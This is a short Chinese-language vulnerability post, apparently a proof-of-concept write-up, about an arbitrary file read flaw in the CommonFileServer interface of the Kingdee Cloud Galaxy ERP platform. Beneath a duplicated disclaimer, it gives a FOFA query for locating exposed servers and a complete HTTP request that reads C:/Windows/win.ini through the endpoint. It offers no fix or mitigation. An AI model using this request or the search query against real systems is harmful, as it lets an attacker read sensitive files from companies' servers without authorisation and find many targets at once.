文章

金蝶云星空CommonFileServer接口存在任意文件读取漏洞

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用

漏洞描述:

金蝶云·星空 是 金蝶软件(中国)有限公司 面向“成长型/中型企业”的云端 ERP/企业管理 SaaS 平台。金蝶软件(中国)有限公司金蝶云·星空平台存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感文件数据

fofa:

app="金蝶云星空-管理中心"

poc:

GET /CommonFileServer/c:/Windows/win.ini HTTP/1.1
Host: *.*.*.*
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

漏洞复现:

发送请求包即可返回文件数据

License:  CC BY 4.0